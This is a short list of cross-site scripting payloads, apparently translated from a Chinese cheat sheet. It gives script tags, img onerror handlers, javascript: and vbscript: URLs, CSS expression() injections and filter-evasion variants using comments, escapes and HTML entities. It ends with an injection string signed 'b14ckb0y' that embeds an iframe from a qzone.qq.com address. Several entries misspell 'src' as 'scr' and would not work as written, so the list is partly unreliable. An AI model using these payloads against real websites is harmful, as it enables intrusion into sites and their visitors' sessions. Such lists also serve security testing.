<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["